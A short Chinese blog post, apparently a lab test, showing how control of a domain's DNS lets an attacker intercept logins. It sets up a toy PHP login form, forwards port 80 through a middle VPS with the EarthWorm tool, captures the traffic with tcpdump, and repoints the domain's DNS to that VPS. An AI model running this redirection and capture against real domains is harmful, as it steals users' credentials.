拿到域名解析权限后
由于自己的域名…出了点问题,就先将就的测试一下
实验环境:
两台vps,一台用于需要攻击的靶机,一台用于中间监听
1、靶机上的登陆页面:
<?php
error_reporting(E_ALL);
if(isset($_POST['p'])){
if($_POST['p'] == "lemon"){
echo "login ok";
}else{
echo "login error";
}
}
?>
<form action="" method="post">
<input type="text" name="p" value="">
<input type="submit" value="login">
</form>
2、中间监听的vps
现在在中间端口转发一下
./ew_for_linux64 -s lcx_tran -l 80 -f 靶机ip -g 80
然后抓取一下流量
tcpdump tcp -i eth1 -t -s 0 -w ./test.cap
最后的是将域名解析改到这个监听的vps上
know it then do it
【推荐】100%开源!大型工业跨平台软件C++源码提供,建模,组态!
【推荐】AI 的力量,开发者的翅膀:欢迎使用 AI 原生开发工具 TRAE
【推荐】2025 HarmonyOS 鸿蒙创新赛正式启动,百万大奖等你挑战
· WPF 引用 ASP.NET Core 的 AOT 版本
· 通过 Canvas 将后端发来的一帧帧图片渲染成“视频”的实现过程
· 当加密ID需要变成Guid:为什么我选择了AES-CBC而非GCM?
· 基于 epoll 的协程调度器——零基础深入浅出 C++20 协程
· 下划线字段在golang结构体中的应用
· 我的AI自学路线,可能对你有用
· WPF 引用 ASP.NET Core 的 AOT 版本
· 如何做一个纯净版的ABP vNext 脚手架
· 告别 DOM 的旧时代:从零重塑 Web 渲染的未来
· 纯 C#实现+AOT 打造的智能PDF目录提取工具 PdfTocExtractor